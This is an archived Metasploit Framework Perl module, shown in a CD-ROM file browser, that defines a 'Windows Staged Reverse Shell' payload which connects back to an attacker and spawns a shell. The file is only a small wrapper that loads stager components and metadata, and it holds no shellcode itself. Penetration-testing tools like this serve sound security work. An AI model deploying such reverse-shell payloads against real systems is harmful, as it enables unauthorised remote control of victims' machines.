home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / payloads / win32_reverse_stg.pm < prev    next >
Text File  |  2006-06-30  |  1KB  |  45 lines

  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Payload::win32_reverse_stg;
  11.  
  12. use strict;
  13. use base 'Msf::PayloadComponent::Windows::ia32::ShellStage';
  14.  
  15. my $info =
  16. {
  17.     'Name'         => 'Windows Staged Reverse Shell',
  18.     'Version'      => '$Revision: 1.16 $',
  19.     'Description'  => 'Connect back to attacker and spawn a shell',
  20.     'Authors'      => [ 'H D Moore <hdm [at] metasploit.com>', ],
  21. };
  22.  
  23. sub _Load 
  24. {
  25.     Msf::PayloadComponent::Windows::ia32::ShellStage->_Import('Msf::PayloadComponent::Windows::ia32::ReverseStager');
  26.  
  27.     __PACKAGE__->SUPER::_Load();
  28. }
  29.  
  30. sub new 
  31. {
  32.     my $class = shift;
  33.     my $hash = @_ ? shift : { };
  34.     my $self;
  35.  
  36.     _Load();
  37.  
  38.     $hash = $class->MergeHashRec($hash, {'Info' => $info});
  39.     $self = $class->SUPER::new($hash, @_);
  40.  
  41.     return($self);
  42. }
  43.  
  44. 1;
  45.